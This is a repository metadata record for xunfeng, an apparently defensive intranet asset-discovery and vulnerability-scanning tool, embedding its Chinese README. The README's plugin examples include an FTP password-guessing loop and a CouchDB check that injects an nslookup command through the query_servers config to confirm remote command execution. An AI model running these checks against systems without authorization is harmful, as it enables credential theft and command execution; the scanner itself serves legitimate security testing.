{"id":13538785,"url":"https://github.com/ysrc/xunfeng","last_synced_at":"2025-05-14T13:09:33.139Z","repository":{"id":40632882,"uuid":"76826511","full_name":"ysrc/xunfeng","owner":"ysrc","description":"巡风是一款适用于企业内网的漏洞快速应急，巡航扫描系统。","archived":false,"fork":false,"pushed_at":"2024-04-16T23:50:57.000Z","size":35271,"stargazers_count":3569,"open_issues_count":70,"forks_count":1327,"subscribers_count":180,"default_branch":"master","last_synced_at":"2025-04-19T13:16:39.456Z","etag":null,"topics":["exploits","infosec","pentesting","scanner","security","security-audit","vulnerability-assessment","vulnerability-detection","vulnerability-scanners"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ysrc.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-12-19T03:56:36.000Z","updated_at":"2025-04-15T00:13:35.000Z","dependencies_parsed_at":"2024-08-01T09:22:12.298Z","dependency_job_id":"c5e6f8cd-ffb6-4486-86e7-2a7da42034c1","html_url":"https://github.com/ysrc/xunfeng","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ysrc%2Fxunfeng","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ysrc%2Fxunfeng/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ysrc%2Fxunfeng/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ysrc%2Fxunfeng/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ysrc","download_url":"https://codeload.github.com/ysrc/xunfeng/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254149977,"owners_count":22022852,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploits","infosec","pentesting","scanner","security","security-audit","vulnerability-assessment","vulnerability-detection","vulnerability-scanners"],"created_at":"2024-08-01T09:01:16.033Z","updated_at":"2025-05-14T13:09:28.123Z","avatar_url":"https://github.com/ysrc.png","language":"Python","funding_links":[],"categories":["\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing","Python","LLM分析过程"],"sub_categories":["\u003ca id=\"c0bec2b143739028ff4ec439e077aa63\"\u003e\u003c/a\u003e漏洞扫描\u0026\u0026挖掘\u0026\u0026发现"],"readme":"# 巡风 [![License](https://img.shields.io/aur/license/yaourt.svg)](https://github.com/ysrc/xunfeng/blob/master/LICENSE)\n----------\n\n**巡风**是一款适用于企业内网的`漏洞快速应急、巡航扫描`系统，通过搜索功能可清晰的了解内部网络资产分布情况，并且可指定漏洞插件对搜索结果进行快速漏洞检测并输出结果报表。\n\n**本软件只做初步探测，无攻击性行为。请使用者遵守《[中华人民共和国网络安全法](http://www.npc.gov.cn/npc/xinwen/2016-11/07/content_2001605.htm)》，勿将巡风用于非授权的测试，YSRC/同程安全应急响应中心/同程网络科技股份有限公司不负任何连带法律责任。**\n\n其主体分为两部分：`网络资产识别引擎`，`漏洞检测引擎`。\n\n网络资产识别引擎会通过用户配置的IP范围`定期自动`的进行端口探测（支持调用MASSCAN），并进行指纹识别，识别内容包括：服务类型、组件容器、脚本语言、CMS。\n\n漏洞检测引擎会根据用户指定的`任务规则`进行定期或者一次性的漏洞检测，其支持2种插件类型、标示符与脚本，均可通过web控制台进行添加。\n\n\n## 安装指南\n\n[![Python 2.7](https://img.shields.io/badge/python-2.7-yellow.svg)](https://www.python.org/) \n[![Mongodb 3.4.0](https://img.shields.io/badge/mongodb-3.4.0-blue.svg)](https://www.mongodb.com/download-center?jmp=nav)\n\n国内镜像 https://code.aliyun.com/ysrc/xunfeng.git\n\n* [Windows 安装指南](./docs/install/Windows.md)\n* [OSX 安装指南](./docs/install/OSX.md)\n* [Linux 安装指南](./docs/install/Linux.md)\n* [Docker 安装指南](./docs/install/Docker.md)\n* [Linux 一条命令安装](./docs/install/Linux_AutoInstall.md)\n\n## 配置指南\n- 在配置-爬虫引擎-网络资产探测列表 设置内网IP段**（必须配置，否则无法正常使用,每个IP段最大限制为10个B段）**。\n- 在配置-爬虫引擎-资产探测周期 设置计划规则。\n- 可启用MASSCAN(探测范围为全端口)代替默认的端口探测脚本，需安装好MASSCAN后配置**程序完整绝对路径**，点击开启即可完成切换。\n  MASSCAN需chmod +x 给执行权限，并手动执行确保可正常运行后再开启。\n- 其他配置根据自身需要进行修改。\n\n## 插件编写\n漏洞插件支持2种类型，json标示与python脚本，可以通过官方推送渠道安装或者自行添加。\n\n**JSON标示符**\n\n![](https://ysrc.github.io/static/img/xunfeng-json-plugin.png)\n\n**Python脚本**\n\n插件标准非常简洁，只需通过 `get_plugin_info` 方法定义插件信息，`check`函数检测漏洞即可。\n\n```python\n# coding:utf-8\n\nimport ftplib\n\ndef get_plugin_info():  # 插件描述信息\n    plugin_info = {\n        \"name\": \"FTP弱口令\",\n        \"info\": \"导致敏感信息泄露，严重情况可导致服务器被入侵控制。\",\n        \"level\": \"高危\",\n        \"type\": \"弱口令\",\n        \"author\": \"wolf@YSRC\",\n        \"url\": \"\",\n        \"keyword\": \"server:ftp\",  # 推荐搜索关键字\n    }\n    return plugin_info\n\ndef check(ip, port, timeout): # 漏洞检测代码\n    user_list = ['ftp', 'www', 'admin', 'root', 'db', 'wwwroot', 'data', 'web']\n    for user in user_list:\n        for pass_ in PASSWORD_DIC:  # 密码字典无需定义，程序会自动为其赋值。\n            pass_ = str(pass_.replace('{user}', user))\n            try:\n                ftp = ftplib.FTP()\n                ftp.timeout = timeout\n                ftp.connect(ip, port)\n                ftp.login(user, pass_)\n                if pass_ == '': pass_ = 'null'\n                if user == 'ftp' and pass_ == 'ftp': return u\"可匿名登录\"\n                return u\"存在弱口令，账号：%s，密码：%s\" % (user, pass_)  # 成功返回结果，内容显示在扫描结果页面。\n            except:\n                pass\n```\n\n此外系统内嵌了辅助验证功能:\n\n\u003e DNS：触发，nslookup randomstr IP，验证， http://ip:8088/randomstr ，返回YES即存在。\n\n\u003e HTTP：触发，http://ip:8088/add/randomstr ，验证， http://ip:8088/check/randomstr ，返回YES即存在。\n\n使用例子:\n\n```python\nimport urllib2\nimport random\nimport socket\n\ndef get_plugin_info():  # 插件描述信息\n    plugin_info = {\n            \"name\": \"CouchDB未授权访问\",\n            \"info\": \"导致敏感信息泄露，攻击者可通过控制面板执行系统命令，导致服务器被入侵。\",\n            \"level\": \"高危\",\n            \"type\": \"未授权访问\",\n            \"author\": \"wolf@YSRC\",\n            \"url\": \"\",\n            \"keyword\": \"server:couchdb\",  # 推荐搜索关键字\n    }\n\ndef get_ver_ip(ip):\n    csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    csock.connect((ip, 80))\n    (addr, port) = csock.getsockname()\n    csock.close()\n    return addr\n\ndef random_str(len):\n    str1=\"\"\n    for i in range(len):\n        str1+=(random.choice(\"ABCDEFGH1234567890\"))\n    return str(str1)\n\ndef check(ip,port,timeout):\n    rand_str = random_str(8)\n    cmd = random_str(4)\n    server_ip = get_ver_ip()\n    req_list = [\n        [\"/_config/query_servers/%s\"%(cmd),'\"nslookup %s %s\u003elog\"'%(rand_str,server_ip)],\n        [\"/vultest123\",''],\n        [\"/vultest123/test\",'{\"_id\":\"safetest\"}']\n    ]\n    for req_info in req_list:\n        try:\n            request = urllib2.Request(url+req_info[0],req_info[1],timeout=timeout)\n            request.get_method = lambda: 'PUT'\n            urllib2.urlopen(request)\n        except:\n            pass\n    try:\n        req_exec = urllib2.Request(url + \"/vultest123/_temp_view?limit=11\",'{\"language\":\"%s\",\"map\":\"\"}'%(cmd))\n        req_exec.add_header(\"Content-Type\",\"application/json\")\n        urllib2.urlopen(req_exec)\n    except:\n        pass\n    check = urllib2.urlopen(\"http://%s:8088/%s\"%(server_ip,rand_str)).read()\n    if 'YES' in check:\n        return u\"未授权访问\"\n```\n\n## 流程演示视频\n\n[![](https://ysrc.github.io/static/img/intro.png)](https://ysrc.github.io/static/video/xunfeng.mp4)\n\n\n## 文件结构\n\n    │  config.py  # 配置文件\n    │  README.md  # 说明文档\n    │  run.bat  # Windows启动服务\n    │  run.sh    # Linux启动服务，重新启动前需把进程先结束掉\n    │\n    ├─aider\n    │      aider.py  # 辅助验证脚本\n    │\n    ├─db  # 初始数据库结构\n    │\n    ├─masscan  # 内置编译好的Masscan程序（CentOS win64适用），需要chmod+x给执行权限（root），若无法使用请自行编译安装。\n    ├─nascan\n    │  │  nascan.py # 网络资产信息抓取\n    │  │\n    │  ├─lib\n    │  │      common.py 其他方法\n    │  │      icmp.py  # ICMP发送类\n    │  │      log.py  # 日志输出\n    │  │      mongo.py  # 数据库连接\n    │  │      scan.py  # 扫描与识别\n    │  │      start.py  # 线程控制\n    │  │\n    │  └─plugin\n    │          masscan.py  # 调用Masscan脚本\n    │\n    ├─views\n    │  │  web.py  # web启动\n    │  │  view.py  # web请求处理\n    │  │\n    │  ├─lib\n    │  │      Conn.py  # 数据库公共类\n    │  │      CreateExcel.py  # 表格处理\n    │  │      Login.py  # 权限验证\n    │  │      QueryLogic.py  # 查询语句解析\n    │  │\n    │  ├─static #静态资源目录\n    │  │\n    │  └─templates #模板文件目录\n    │\n    └─vulscan\n        │  vulscan.py  # 漏洞检测进程\n        │\n        └─vuldb # 漏洞库目录\n\n扫描下方二维码关注YSRC公众号，回复自己的微信号+巡风，会有人拉你进巡风的微信讨论群。\n\n![](http://mmbiz.qpic.cn/mmbiz/PAV8ewtdsKpkeG9VRYNhC76iacVSe3ichYiajictdF2Q34PQo7iaPV15jjGiaAev6SqpeK5maDvtAYUtqXEYUib4ljM3A/640?wx_fmt=jpeg\u0026tp=webp\u0026wxfrom=5\u0026wx_lazy=1)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fysrc%2Fxunfeng","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fysrc%2Fxunfeng","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fysrc%2Fxunfeng/lists"}